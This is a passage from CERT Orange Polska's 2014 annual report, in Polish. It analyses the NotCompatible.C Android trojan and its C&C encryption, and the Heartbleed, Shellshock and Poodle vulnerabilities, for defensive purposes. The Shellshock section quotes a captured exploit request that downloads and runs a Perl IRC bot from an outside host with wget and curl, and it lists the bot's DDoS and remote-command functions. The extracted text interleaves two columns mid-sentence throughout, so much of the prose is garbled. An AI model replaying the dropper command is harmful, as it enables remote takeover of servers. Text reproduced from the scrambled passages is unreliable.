Pierwszy raz malware o nazwie NotCompatible został Jak widać, uruchomiony malware utworzył proces wykryty w 2012 roku. o nazwie com.security.patch. Można to sprawdzić z pozio- Na początku kod używany był jako serwer proxy do kam- mu włączonego telefonu w zakładce pokazującej wykaz panii spamowych. Do dzisiaj znacznie się rozrósł, tworząc uruchomionych aplikacji oraz procesów w telefonie z sys- ogromny botnet, zdolny m.in. do spamowania użytkowni- temem Android. ków albo przeprowadzania zautomatyzowanych ataków, Zainfekowany telefon właściciela może również wykazy- np. na WordPress. wać wyższe niż zwykle zużycie transferu danych i energii.

Wykorzystując NotCompatible jako proxy, atakujący może Zalecamy sprawdzenie, czy w telefonie nie jest urucho- wykonać wiele czynności, w tym poszukiwanie wrażli- miony proces o nazwie podobnej jak „com.security.patch”, wych hostów w sieci, znajdowanie luk w zabezpiecze- działający jako usługa, której nie widać w menu telefonu. niach i narażonych wrażliwych danych. Szacuje się, że Rekomendujemy, aby użytkownicy nie instalowali aplikacji w samych Stanach Zjednoczonych liczba infekcji może z niepotwierdzonego źródła ani nie instalowali aplikacji, jeśli sięgać 4,5 miliona zainfekowanych maszyn. Zasięg infekcji nie pamiętają, czy była ona pobierana na telefon. Należy

Rysunek 37. tego wirusa to ok. 20 000 maszyn dziennie; kanałem pro- również włączyć w telefonie funkcję blokowania instalacji Zrzut pokazujący uruchomiony pagacji jest spam. aplikacji z niezaufanych źródeł. plik instalacyjny ze złośliwym Można się spotkać ze sprzecznymi informacjami na temat oprogramowaniem funkcjonalności tego malware’u. Jedne źródła wskazują, Nazwa pliku z trojanem: Update.apk że zainfekowany telefon służy do włamania się do prywat- Suma kontrolna MD5: feace958b47c2249c6ab8ddf- nych sieci komputerowych. Inne zaś, że główną funkcjo- 804cdcb6 Rysunek 38. nalnością jest tworzenie botnetu. Rozbieżności nie dziwią, Wielkość w bajtach: 64808 Wykaz procesów uruchomionych gdyż analizowana próbka wykonuje oba zadania. Jeśli zło- w środowisku wirtualnym śliwe oprogramowanie zaatakuje urządzenie należące do Analizowana próbka przeznaczona jest jedynie na urzą- z systemem Android, w tym organizacji, może się również dostać do środowiska kor- dzenia mobilne z platformą Android. Po zdebugowaniu złośliwy kod poracyjnego. pliku Update.apk w jego plikach źródłowych (konkretnie: AndroidManifest.xml) widać, do jakich zasobów odwołuje Najnowsza przeanalizowana przez CERT Orange Pol- się malware: ska mutacja kodu, NotCompatible.C, została wykryta w zeszłym roku. Wykazywanie jednocześnie obu głównych • android.permission.INTERNET – pozwala aplikacji na funkcjonalności utrudniło początkowo jego analizę. Osta- otwarcie gniazd sieciowych, tecznie jednak eksperci CERT Orange Polska przepro- • android.permission.ACCESS_NETWORK_STATE wadzili analizę laboratoryjną kodu – zarówno statyczną, jak – pozwala aplikacji na dostęp do informacji o sieci, i dynamiczną. • android.permission.RECEIVE_BOOT_COMPLETED – pozwala na otrzymanie przez malware informacji Rysunek 39. Malware rozpowszechniany jest poprzez atak „drive-by o zakończeniu uruchamiania systemu oraz o zakresie Malware widoczny w wykazie download”, wykorzystujący podatność przeglądarki na wersji środowiska, w którym będzie ona działać od uruchomionych aplikacji platformie Android. Schemat ataku jest następujący: minSdkVersion=”7” do targetSdkVersion=”17”. • użytkownik odwiedza zainfekowaną witrynę, na której >> Rysunek 40. znajduje się złośliwy skrypt, • skrypt automatycznie pobiera plik, Malware ma zaimplementowaną względnie dużą liczbę • by uruchomić złośliwy kod użytkownik akceptuje insta- funkcji, które zapewniają mu bezproblemowe działanie lację złośliwej aplikacji. w każdej sieci. Ma między innymi: • wzajemne uwierzytelnianie się za pomocą klucza RSA Po instalacji wirus uruchamiany jest dopiero przy następ- i RC4, nym i każdym kolejnym restarcie telefonu. Pierwszy raz • wsparcie protokołów UDP i TCP, w histori atak „drive-by download” został wycelowany • komunikację p2p pomiędzy zainfekowanymi telefonami, w urządzenia z systemem Android. • wiele serwerów Command&Control rozmieszczonych >> Rysunek 37-38. w różnych lokalizacjach.

58 59 Raport CERT Orange Polska za rok 2014

Rysunek 40. Malware instaluje się w lokalizacji /data/data/com.security. dla zasobu o id 0x7f030000, co po zamianie na system Manifest analizowanego malware patch/. dziesiętny daje nam liczbę 2130903040, którą wykorzystu- Trojan wykorzystuje dość złożoną dwupoziomową tech- je metoda „Load()” klasy „config” do identyfikacji zasobu, nikę komunikacji pomiędzy zainfekowaną maszyną a ser- podobnie jak klucz RSA. werami Command&Control. Pierwsza część składa się >> Rysunek 44. z serwera Command&Control pełniącego rolę bramy wej- ściowej weryfikującej jedynie komunikację zainfekowanego Schemat działania wymiany kluczy RSA i RC4 w komuni- telefonu z serwerem. kacji krok po kroku: Ma również funkcję „loadbalancera”, który rozkłada ruch 1. Zainfekowany telefon pobiera klucz publiczny RSA zainfekowanych telefonów. z pliku „pub”. 2. Zainfekowany telefon generuje swoją parę kluczy RSA: Rysunek 41. Na poprzedniej stronie został przedstawiony schemat klucz prywatny i klucz publiczny. Komunikacja z serwerem C&C komunikacji pomiędzy zainfekowanym telefonema serwe- 3. Zainfekowany telefon wysyła klucz publiczny wygene- rami Command&Control. Linie przerywane oznaczają połą- rowany w punkcie 2 do serwera Command&Control. czenie szyfrowane. 4. Po odebraniu klucza publicznego z zainfekowanego >> Rysunek 41. telefonu Command&Control generuje klucz RC4, szyfruje go kluczem publicznym przesłanym przez mal- Wymiana danych między serwerem Command&Con- ware, a następnie wysyła go do telefonu. Telefon po trol a telefonem odbywa się za pomocą wymiany klucza odebraniu zaszyfrowanego klucza RC4 odszyfrowuje publicznego RSA, który zapisany jest w pliku „pub”, dołą- go swoim kluczem prywatnym. czonym do malware. 5. Od tego momentu cała komunikacja będzie szyfrowa- Na poprzedniej stronie został przedstawiony kod, który na algorytmem RC4 z kluczem symetrycznym wymie- przedstawia metodę „loadKey()” klasy RSA po dekompi- nionym wcześniej w punkcie 4. Dalsza komunikacja lacji kodu malware. jest szyfrowana. >> Rysunek 42. Co więcej, gdy wszystkie serwery Command&Control są Rysunek 42. W pliku „public.xml” umieszczona jest wartość ID dla zaso- zablokowane, malware odpytuje przez protokół P2P inne Metoda „loadKey()” klasy RSA bu o ID 0x7f030001, co po zamianie na system dziesiętny zainfekowane urządzenie o najnowszy plik konfiguracyjny daje nam liczbę 2130903041, którą wykorzystuje metoda od głównego serwera, by się dowiedzieć o docelowy adres loadkey w powyższym kodzie. serwera Command&Control. Taka funkcjonalność umożli- >> Rysunek 43. wia wykonywanie połączeń w sposób niezauważony przez zainfekowanego. Na następnej stronie został przedstawio- Oprócz algorytmu RSA malware wykorzystuje algorytm ny schemat komunikacji pomiędzy dwoma zainfekowany- Rysunek 43. RC4, który służy mu do szyfrowania i deszyfrowania mi telefonami aż poprzez wykorzystanie P2P w chwili, gdy Zawartość pliku public.xml danych wymienianych z serwerem Command&Control. adresy serwerów Command&Control są blokowane. W pliku „public.xml” umieszczona jest również wartość >> Rysunek 45.

Rysunek 44. Zawartość klasy config oraz metody „Load()”

60 61 Raport CERT Orange Polska za rok 2014

Rysunek 45. Kod jest ciekawy z tego powodu, że szyfruje całe połą- Gdy dany adres IP Command&Controll jest blokowany, Komunikacja między telefonami czenie między klientem a serwerem Command&Control. malware wykorzystuje funkcjonalność p2p, pobierając naj- Mamy więc do czynienia z pierwszym malware posiada- nowszy plik konfiguracyjny od zainfekowanego wcześniej jącym dwustopniowy proces przekazywania skradzionych telefonu. Funkcja ma na celu ominięcie blokowania komu- danych. Pierwszy serwer Command&Control spełnia funk- nikacji na poziomie IP oraz DNS. cję bramy weryfikującej, czy połączenie przychodzi od wła- Takie działanie ma przeważnie na celu ukrycie złośliwej ściwego zainfekowanego telefonu, po czym ruch jest roz- aktywności wirusa podczas komunikacji z Command&- kładany i przepuszczany do głównego Command&Control, Control, by sondy antymalware nie mogły odrozróżnić przekazując informację o adresie głównego Command&- poprawnego ruchu sieciowego od złośliwego ruchu pomię- Control. dzy zainfekowanym maszynami a Command&Control. Zestawienie połączeń na poprzedniej stronie przedstawia Opisywane w poprzednim akapicie systemy do detekcji Rysunek 46. komunikację pomiędzy pierwszym serwerem Command&- ruchu nie potrafią zdefiniować złośliwego ruchu, gdy jest Komunikacja zainfekowanego Control a zainfekowanym telefonem. on szyfrowany między klientem a serwerem z wykorzysta- telefonu z serwerem >> Rysunek 46. niem pary kluczy oraz algorytmów RSA i RC4. Command&Control Podczas analizy dynamicznej przechwycono połączenia Malware pobiera adres IP ze swojego pliku konfiguracyj- na adres IP 173.242.124.163 na porcie 443 do pierwsze- nego znajdującego się na telefonie w lokalizacji /data/data/ go Command&Control. Domena, z jaką ustanawia połą- com.security.patch/files/data.bin. czenie, to dedispace.com. Plik szyfrowany jest algorytmem RC4. Do jego zdekodo- Na poprzedniej stronie przedstawiona została komunikacja wania podczas analizy statycznej użyty został nieco zmo- telefonu, który jest już zainfekowany i łączy się z wieloma dyfikowany mechanizm odnaleziony w źródłach malware. alternatywnymi serwerami Command&Control znajdujący- Po zdekodowaniu pliku data.bin można uzyskać informa- mi się w Wielkiej Brytanii. cję o adresie IP, z jakim się łączy zainfekowany telefon – to >> Rysunek 48. Rysunek 47. 173.242.124.163 na porcie 443. Zawartość metody „init()” Podsumowanie inicjalizacyjnej dla klasy Trojan wykonuje również operacje po stronie telefonu. Uru- Malware NotCompatible.C, jak wynika z analizy, wyznacza „ThreadServer”, która jest chamiając się, odwołuje się do klas ThreadServer. nowe trendy w technikach ataków na urządzenia mobilne. odpowiedzialna za tworzenie android.permission.ACCESS_NETWORK_STATE Jest nie tylko zagrożeniem dla potencjalnych użytkowni- wszystkich mechanizmów method call: „Lcom/security/patch/ThreadServer/getIn- ków, lecz także dotyka sektora korporacyjnego. szyfrowania i zestawiania połączeń net()Z” calls „Landroid/net/ConnectivityManager/getActiveNetworkIn- Tym bardziej istotne staje się rygorystyczne przestrzega- fo()Landroid/net/NetworkInfo;” nie zasady nieinstalowania aplikacji z niezaufanych źródeł >> Rysunek 47. lub aplikacji, których użytkownik sam nie ściągnął na swój telefon.

Rysunek 48. Komunikacja z serwerami C&C

62 63 Raport CERT Orange Polska za rok 2014

11.4 Załącznik 4. Analiza podatności Heartbleed W powyższej strukturze pole „type” ma długość 1 bajta tury SSL3_RECORD, która opakowuje ramki Heartbeat i może mieć wartość heartbeat_request (0x01) lub heart- i zawiera informacje o typie ramki (0x18 – heartbeat) wer- beat_response (0x02), pole payload_length ma długość sji protokołu (0x03, 0x1), długości opakowanych danych Luka Heartbleed została przypadkowo wprowadzona do niesionych w związku z nimi strat jest trudne. Amerykań- 2 bajtów, pole payload powinno mieć zadeklarowaną (0x0003). Natomiast na żółto zaznaczone zostały części pakietu OpenSSL w grudniu 2011 roku w ramach realiza- skie repozytorium National Vulnerability Database nadało w payload_length długość, a pole padding ma długość wiadomości Heartbeat – typ wiadomości (0x1 – żądanie) cji rozszerzenia TLS proponowanego przez standard RFC luce Heartbleed najwyższą ocenę (10), jeśli chodzi o ła- wyznaczaną w trakcie budowania ramki. oraz deklarowana długość (0x4000 – 16384 bajty). 6520, natomiast informacje o jej odkryciu opublikowano twość wykorzystania (exploitability subscore). Bardzo ważną częścią struktury jest pole payload_length, Drugi wiersz (podświetlony na niebiesko) to pakiet zawie- w kwietniu 2014 roku. Pozwala ona na odczytanie dużych które z założenia powinno zawierać liczbę bajtów danych rający odpowiedź ofiary – czyli 16384 bajty danych, które fragmentów pamięci (jednorazowo maksymalnie 64KB) Wprowadzenie mechanizmu Heartbeat miało na celu wysłanych w żądaniu. Jednak w podatnej wersji OpenSSL wyciekły. z procesu podatnego programu, co w konsekwencji umożliwienie stronom sesji SSL sprawdzenie, czy druga wartość ta nie jest w żaden sposób weryfikowana, tj. od- umożliwia wyciek wielu poufnych informacji, w tym przede strona wciąż poprawnie odbiera i nadaje wiadomości, biorca wierzy, że pakiet rzeczywiście zawiera zadeklarowa- CERT Orange Polska radzi: wszystkim prywatnego klucza użytkownika/serwera apli- oraz odświeżenie wpisów dotyczących stanu połączenia ną liczbę bajtów. Tymczasem atakujący może w żądaniu Administratorzy serwerów, wykorzystujący oprogramowa- kacji, dzięki któremu atakujący jest w stanie odszyfrować w tabelach NAT16. W tym celu wysyła żądanie Heartbeat, zawrzeć na przykład jeden bajt danych, deklarując mak- nie OpenSSL, powinni zweryfikować, czy korzystają z ak- treść przechwyconej komunikacji, wstawiać do jego kana- w którym zawarta jest pewna liczba bajtów danych. Wę- symalną możliwą długość tego pola, czyli 65535 bajtów. tualnej niepodatnej wersji (wersje gałęzi 1.0.0, 0.9.8 lub od łu komunikacyjnego własną treść (atak Man in The Middle) zeł po drugiej stronie powinien odebrać dane i odesłać je W trakcie przetwarzania atakowana strona konstruuje pa- wersji 1.0.1g wzwyż w gałęzi 1.0.1). Jeśli przeprowadzenie oraz posługiwać się jego certyfikatem. Możliwe jest zatem w identycznej postaci do nadawcy. Luka bezpieczeństwa kiet, do którego kopiuje 65535 bajtów, które znajdują się aktualizacji nie jest możliwe, należy zastosować oprogra- np. śledzenie i rejestrowanie interakcji z usługami WWW występuje przy przetwarzaniu opisanego poniżej złośliwe- daleko poza buforem zawierającym oryginalny jeden bajt. mowanie typu IDS lub WAF, które odpowiednio skonfigu- (np. działań w aplikacji pocztowej), a w efekcie przechwy- go żądania. W ten sposób atakujący może uzyskać dostęp do nieprze- rowane skutecznie blokują próby wykorzystania luki Hear- cenie danych uwierzytelniających (m.in. bankowości inter- znaczonych dla niego informacji, a często wśród nich – tbleed. netowej, co może się stać punktem wyjścia do kradzieży Żądanie oraz odpowiedź powinny zostać zawarte w ramce klucza prywatnego. Jako reakcja na podatności w oprogramowaniu OpenSSL danych lub środków z kont bankowych). o następującej strukturze: powstały ich tzw. forki, czyli oddzielne projekty kontynuują- Przykładowy zapis transmisji z przeprowadzonego ataku ce rozwój projektów oryginalnych od pewnego momentu, struct { przedstawiono na poprzedniej stronie. lecz ze zmienionymi założeniami lub podejściem. Wśród Podatna biblioteka jest niezwykle popularna – w chwili HeartbeatMessageType type; >> Rysunek 49. nich najważniejsze to LibreSSL rozwijany przez dewelo- opublikowania informacji o luce podatnych było około pół uint16 payload_length; perów systemu OpenBSD (którzy krytycznie odnieśli się miliona działających w sieci serwerów WWW. Sytuację opaque payload[HeartbeatMessage.payload_ Pierwszy wiersz z wartościami heksadecymalnymi (pod- do projektu OpenSSL) oraz BoringSSL rozwijany przez dodatkowo pogarszał fakt, że atakujący podatną usługę length]; świetlony na czerwono) to pakiet wysłany przez atakujące- Google, które zapowiedziało współpracę w tym zakresie w przeciętnej sieci usługowej nie zostawiał po ataku prak- opaque padding[padding_length]; go. Części pakietu zaznaczone na zielono to części struk- tycznie żadnego śladu. Z tego powodu samo oszacowanie } HeartbeatMessage; z deweloperami pozostałych projektów. liczby ataków (w tym zakończonych sukcesem) oraz po-

Rysunek 49. Zapis transmisji przeprowadzonego ataku

16 Technologia podwyższonej ochrony wprowadzona w Windows Vista/Windows 7, w założeniu ograniczająca dostęp aplikacji momentu autoryzacji przez administratora 64 65 Raport CERT Orange Polska za rok 2014

11.5 Załącznik 5. Analiza podatności Shellshock Jeśli po wywołaniu skryptu wyświetla się treść „Bash możliwych do wykorzystania wektorów ataku. Może zawiera lukę CVE-2014-6271”, to znaczy, że w użyciu jest to być zarówno złośliwe żądanie HTTP wykonane podatna wersja programu i należy ją aktualizować. z drugiego końca świata, jak i złośliwe odpowiedzi Podatność Shellshock została upubliczniona 24 wrze- • Postfix, Część internautów zapewne pamięta epidemie robaków: serwera DHCP umieszczonego w sieci lokalnej bądź śnia 2014 roku i jest już dość dokładnie opisana. Pokrót- • Pure-FTPd, Sasser, wykorzystującego lukę CVE-2003-0533, odpowie- też ostatnio zaobserwowane próby ataków poprzez ce można podsumować ją w następujący sposób: część • OpenVPN. dzialnego za straty oszacowane na 18 miliardów dolarów, SMTP. Ponadto niektóre z tych usług są niemożliwe do programu bash, czyli popularnej powłoki systemów ope- oraz Blaster (CVE-2003-0352, 320 mln dol.). Echa tych blokowania lub filtrowania z uwagi na duży wolumen racyjnych, przeprowadza wykonanie treści, która powinna Obecnie do luki Shellshock i luk z nią powiązanych (np. epidemii można obserwować do dzisiaj pomimo wytężo- prawidłowego ruchu na odpowiadających im portach. zostać zinterpretowana jako dane. Opisywana luka pozwa- opartych na podobnym błędzie lub powstałych w wyniku nych wysiłków mających na celu zniwelowanie ich skut- la na przekazanie do programu takiej treści za pośrednic- błędu w poprawce) przypisano następujące identyfikatory ków (np. blokowania na poziomie ISP portów, na których Zespół CERT Orange Polska zaobserwował również kilka twem zmiennych środowiskowych. podatności w bazie CVE: działają podatne usługi). W opinii ekspertów CERT Orange działających dropperów18 wykorzystywanych m.in. do two- CVE-2014-6271 Polska istnieje duże ryzyko, że Shellshock doprowadzi do rzenia botnetu przeznaczonego do wykonywania ataków Czynnikiem, który decyduje o tym, że Shellshock jest jed- CVE-2014-7169 podobnej epidemii wśród systemów działających pod kon- DDoS. Poniżej przedstawiono jeden z nich: ną z najbardziej niebezpiecznych luk zaobserwowanych od CVE-2014-7186 trolą systemów Linux i Unix. „GET /cgi-bin/hi HTTP/1.0” 404 402 „-” „() { :;}; /bin/bash lat, jest fakt, iż podatna powłoka jest bardzo popularna. CVE-2014-7187 -c \”cd /tmp;wget http://xxx.xxx.193.10/ji;curl -O „/tmp/ji Powłoka bash jest ulubioną powłoką wielu administrato- CVE-2014-6278 Luka Shellshock ma cechy czyniące ją idealnym mecha- http://xxx.xxx.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\” rów systemowych i bardzo często zostaje wybrana jako CVE-2014-6277 nizmem dostarczania odpowiedników takich robaków do domyślna powłoka dystrybucji systemów klasy Linux/ systemów korzystających z bash. Najważniejsze z nich to: Exploit przedstawiony na poprzedniej stronie ma za zada- Unix. Jej popularność znacznie przewyższa alternatywne Już pod koniec września udostępniono patche łatające • zdalne wykonanie i blind injection nie zainstalować w zaatakowanym systemie inny złośliwy programy: dash, zsh etc. Dodatkowo, wiele programów podatne wersje bash. Ich zastosowanie chroni przed ata- Robak, który skanuje sieć internet w poszukiwaniu program (w tym przypadku IRC-bot napisany w języku wchodzi w interakcję z systemem operacyjnym właśnie kami na wszystkie programy korzystające z tej powłoki. podatnych usług, potrzebuje bardzo niewiele cza- Perl). Jego kod jest relatywnie zrozumiały, napisany w języ- za pośrednictwem domyślnej powłoki przy wykorzystaniu su i zasobów, by zainfekować kolejną maszynę. Po ku zbliżonym do ludzkiego i nie istnieje potrzeba prze- wywołania „system”, np.: W celu sprawdzenia, które programy korzystają z powłoki nawiązaniu sesji w warstwie transportowej po prostu prowadzania zaawansowanej inżynierii wstecznej. Bot po • moduły obsługujące skrypty CGI w serwerach WWW, bash, najlepiej przejrzeć pliki wykonywalne w poszukiwa- wysyła na oślep szkodliwy ładunek (exploit) i natych- uruchomieniu stara się podłączyć do kanału C&C (serwera • interfejsy WWW wielu platform technologicznych niu tych, które importują wywołanie „system”. Tablicę funk- miast przechodzi do infekowania kolejnej maszyny. IRC), a następnie czeka na rozkazy i je wykonuje. i urządzeń, cji importowanych przez programy w formacie ELF można Wysłany ładunek, jeśli trafi na podatną aplikację, uzy- >> Rysunek 50. • popularne programy do przesyłania plików i uzyskiwa- uzyskać, korzystając z narzędzi objdump lub readelf, np.: skuje bezpośredni dostęp do powłoki zainfekowanego systemu. Jest to bardzo duży stosunek destrukcyjne- nia zdalnego dostępu do powłoki. locations=”/bin /sbin” Wśród obsługiwanych przez bota rozkazów znajdują się: go potencjału (potencjału propagacji) do jego kosztu. for loc in locations; do find $loc -type • portscan – skanowanie wybranego komputera w celu • łatwość wykorzystania podatności Wśród programów korzystających z systemowej powłoki, f -executable; done | while read ff; odkrycia niektórych popularnych usług (telnet, SSH, Funkcjonalny exploit17 można napisać w dwóch, trzech więc zagrożonych atakiem wykorzystującym omawianą do echo $loc$ff; objdump -T $loc$ff | FTP, WWW etc.), linijkach języka bash. Nie trzeba omijać zabezpieczeń podatność, znajdowały się się m.in.: grep system; done • tcpflood – przeprowadzenie ataku DDOS na wybrany • moduł do serwera Apache - mod_cgi, stosu, radzić sobie z nowoczesnymi zabezpieczenia- cel za pośrednictwem protokołu TCP, • aplikacja cPanel, W celu sprawdzenia, czy używana wersja powłoki bash mi przed exploitami ani z eskalacją uprawnień. Nawet • google – skanowanie w poszukiwaniu podatnych apli- • produkty firmy F5, m.in. BIG-IP, jest podatna, można posłużyć się poniższym skryptem: średnio doświadczony programista może skutecznie kacji WWW oraz infekowanie ich, uderzyć w samo serce systemu teleinformatycznego. • dhcpcd, env X=’() { :; }; echo „Bash zawiera • httpflood – przeprowadzenie ataku DDOS na warstwę • duża liczba usług korzystających z podatnej aplikacji • SSH, lukę CVE-2014-6271”’ bash -c id aplikacji na wybrany cel za pośrednictwem protokołu Trudno precyzyjnie oszacować liczbę aplikacji sto- HTTP, sujących wywołanie „system”, które mogą korzystać • udpflood – przeprowadzenie ataku DDOS na wybrany z podatnej wersji bash, ale wiadomo, że jest ich dużo cel za pośrednictwem protokołu UDP. i że są różnorodne. Zwiększa to diametralnie liczbę >> Rysunek 511. Rysunek 50. Kod odpowiedzialny za przyłączenie do kanału C&C Rysunek 51. Kod obsługujący rozkazy

17 Program wykorzystujący błąd występujący w oprogramowaniu, prowadzący do przejęcia kontroli nad działaniem procesu i wykonaniem odpowiednio spreparowanego kodu 18 66 Program instalujący złośliwy kod na komputerze ofiary 67 Raport CERT Orange Polska za rok 2014

Rysunek 52. Bot obsługuje również polecenia wykorzystywane na ser- i korzystania jedynie z aktualnych wersji oprogramowania Kod obsługujący rozkazy werach IRC takich jak: connect, join, part, op, msg. Dodat- należy pamiętać o strategii zabezpieczania infrastruktury – ciąg dalszy kowo za pomocą polecenia „eval” pozwala na wykonanie zawierającej elementy wielowarstwowej obrony, a także dowolnej przesłanej przez botmastera komendy. minimalizacji powierzchni ataku. >> Rysunek 52. • Nie należy udostępniać usług, które nie są wymagane

do działania infrastruktury. W wybranych segmentach sieci Orange zaobserwowa- • Należy wprowadzać segmenty o zróżnicowanym liśmy próby wykorzystania luki shellshock kierowane na poziomie ryzyka, które są od siebie odseparowane porty serwerów WWW. Na Wykresie 22. przedstawiono i uniemożliwiają lub utrudniają eskalowanie złośliwego zestawienia zaobserwowanych żądań w poszczególnych oprogramowania na inne systemy (np. segment DMZ). miesiącach na próbce z ostatniego kwartału 2014 roku. • Prowadzić kontrolę i działania mające na celu minima- >> Wykres 22. lizację powierzchni ataku, na przykład wyłączając lub odcinając dostęp do niepotrzebnych usług. Żądania zawierały głównie odwołania do zasobów stano- Wykres 22. wiących skrypty cgi, ale można zaobserwować również Najważniejszą rzeczą, którą powinni wykonać admini- 100 80 Wykres złośliwych żądań próby przełamania zabezpieczeń mechanizmów Server stratorzy systemów Linux, Unix, MacOS X oraz innych 60 40 w podziale na dni Side Include (dynamicznie generujący strony WWW korzystających z programu bash, jest upewnienie się, że 20 mechanizm skryptowy). zainstalowana została najnowsza dostępna odporna wer- 0 >> Wykres 23. sja programu, a jeśli tak nie jest – niezwłoczne wykonanie aktualizacji. 10/1/2014 10/2/2014 10/3/2014 10/4/2014 10/5/2014 10/6/2014 10/7/2014 10/8/1014 10/9/2014 10/10/2014 10/11/2014 10/12/2014 10/13/2014 10/14/2014 10/15/2014 10/16/2014 10/17/2014 10/18/2014 10/19/2014 10/20/2014 10/21/2014 10/22/2014 10/23/2014 10/24/2014 10/25/2014 10/26/2014 10/27/2014 10/28/2014 10/29/2014 10/30/2014 10/31/2014 Wśród źródeł żądań prym wiodą systemy znajdujące się Jeśli wykonanie aktualizacji jest niemożliwe lub utrudnione, 120 100 na terenie USA. Nie oznacza to, że atakujący prowadzą należy zastosować tymczasowe środki zapobiegawcze, 80 60 swoje operacje z tego rejonu. Możliwe, że tak duży odse- takie jak ograniczenie dostępu do usług lub filtrowanie 40 20 tek żądań jest wynikiem dużej liczby zainfekowanych sys- treści z wykorzystaniem sygnatur. Przykładowe metody 0 temów podejmujących automatycznie próby ataku. wprowadzenia środków zapobiegawczych: >> Wykres 24. 1. Filtrowanie żądań przy wykorzystaniu systemu WAF 11/2/2014 11/3/2014 11/4/2014 11/5/2014 11/6/2014 11/7/2014 11/8/1014 11/9/2014 11/ 1/2014 11/10/2014 11/11/2014 11/12/2014 11/13/2014 11/14/2014 11/15/2014 11/16/2014 11/18/2014 11/19/2014 11/20/2014 11/21/2014 11/22/2014 11/23/2014 11/24/2014 11/25/2014 11/26/2014 11/27/2014 11/28/2014 11/29/2014 11/30/2014

11/17/ 2014 lub przekierowanie ich na podstawie reguł zdefiniowa- 80 CERT Orange Polska radzi: nych w pliku .htaccess. 60 Nawet tak dojrzałe i rozpowszechnione oprogramowanie 2. Dopasowanie wzorców i blokowanie za pomocą fire- 40 20 jak powłoka bash może zawierać krytyczne podatności. walla żądań, które świadczą o próbie wykorzystania 0 Dlatego oprócz wydajnego zarządzania zagrożeniami podatności. 12/1/2014 12/2/2014 12/3/2014 12/4/2014 12/5/2014 12/6/2014 12/7/2014 12/8/1014 12/9/2014 12/10/2014 12/11/2014 12/12/2014 12/13/2014 12/14/2014 12/15/2014 12/16/2014

Wykres 23. /start.phtml Najpopularniejsze żądania /cgi-sys/entropysearch.cgi /cgi-sys/defaultwebpage.cgi /cgi-mod/index.cgi /cgi-bin/main.cgi /cgi-bin/sys.cgi / kid,4002009697,id, /cgi-bin/test.cgi Wykres 24: /cgi-bin/fire.cgi Żądania wysyłane z krajów /cgi-sys/FormMaiI-clone.cgi INNE 8% /cgi-bin/ na podstawie adresów IP

/cgi-bin-sdb/printenv US 39% SG 2% – udział procentowy /cgi-bin/test/test.cgi 3% /cgi-bin/index.cgi CN /cgi-bin/bash UA 3% /cgi-bin/phpS-cli 050 100 150 200 PT 4%

BT 11%

RU 17% DE 13%

68 69 Raport CERT Orange Polska za rok 2014

Rysunek 53. 11.6 Załącznik 6. Analiza podatności Poodle Tux jawny

Secure Socket Layer (SSL) to stworzony przez Netscape same bloki szyfrogramu. Aby temu zapobiec, algorytm w 1994 roku protokół zabezpieczania transmisji siecio- szyfrujący przy tworzeniu szyfrogramu poddaje kolej- wych. Jego pierwsze wersje zawierały wiele słabości i luk ne bloki tekstu jawnego działaniu operacji XOR przy bezpieczeństwa, dlatego dość szybko dokonano przeglą- użyciu poprzedniego szyfrogramu. Dzięki temu dwóm du protokołu, by w 1996 roku opublikować go w wersji 3.0. identycznym blokom tekstu jawnego w pojedynczej Od tego czasu SSL wyewoluował w kolejne wersje proto- transmisji odpowiadają dwa różne bloki tekstu szyfro- kołu TLS, jednak wiele programów i urządzeń w sieci inter- wanego. net nadal ich nie obsługuje, stąd w nowych protokołach istnieją mechanizmy zapewniające wsteczną kompatybil- Aby wyobrazić sobie, w jaki sposób wiązanie bloków ność. (CBC) wpływa na bezpieczeństwo komunikacji, można się oprzeć na ilustracjach przedstawiających maskotkę syste- 14 października 2014 roku członkowie zespołu Google mu Linux, sympatycznego pingwina Tuxa, w trzech posta- Security Team opublikowali informacje o odkrytej w pro- ciach: jawnej, zaszyfrowanej w trybie EBC i w trybie CBC tokole SSLv3 luce „Poodle”. Luka dotyczy nie konkretnej (obrazki pochodzą z Wikipedia.com). implementacji SSL, ale całego protokołu. Z tego powo- >> Rysunki 53-55. du wszystkie wspierające go implementacje są podatne Rysunek 54. na ataki. W wyniku ataku na omawianą lukę możliwe jest • Algorytmy w podatnych zestawach wyznaczają war- Tux zaszyfrowany ECB odzyskanie części tekstu jawnego transmisji. tość tzw. funkcji MAC (ang. Message Authentication Przygotowanie do wykorzystania luki polega na przejęciu Code) jedynie na części tekstu jawnego, zupełnie przez atakującego i takim zmodyfikowaniu transmisji sie- ignorując tzw. uzupełnienie, czyli dołączane na końcu ciowej, żeby zmusić strony transmisji do wybrania kon- tekstu jawnego nieznaczące dane mające za zadanie kretnej wersji protokołu podatnej na atak (tzw. downgra- zaokrąglić jego długość do wielokrotności szerokości de dance). Dzieje się to na etapie uzgadniania wspólnego bloku. Długość uzupełnienia pomniejszona o 1 jest zestawu szyfrującego, jeszcze przed zestawieniem bez- zapisywana jako jego ostatni bajt. piecznego połączenia. Treść komunikacji wartość MAC uzupełnienie

Do przeprowadzenia demonstracyjnego ataku wykorzy- stano następujące cechy protokołu SSL: • Strona komunikacji SSL przyjmie szyfrogram, w któ- • Większość algorytmów szyfrujących używanych przez rym zmodyfikowana jest ostatnia część zawierająca SSL to algorytmy blokowe, działające w trybie wiązania uzupełnienie, pod warunkiem że po odszyfrowaniu bloków (ang. Cipher-Block Chaining, CBC). Tryb ten ostatni jego bajt będzie miał poprawną wartość. powinien zwiększać bezpieczeństwo algorytmu dzięki • Przyjęto założenie, że atakujący może kontrolować kryptograficznemu powiązaniu wszystkich bloków szy- część zawartości tekstu jawnego. frogramu. W innym przypadku (gdyby algorytm działał w trybie Electronic Code Book, ECB), takim samym W kryptologii atak taki nosi nazwę ataku z wybranym tek-

Rysunek 55. blokom tekstu jawnego zawsze odpowiadałyby takie stem jawnym. Tux zaszyfrowany CBC

70 71 Raport CERT Orange Polska za rok 2014

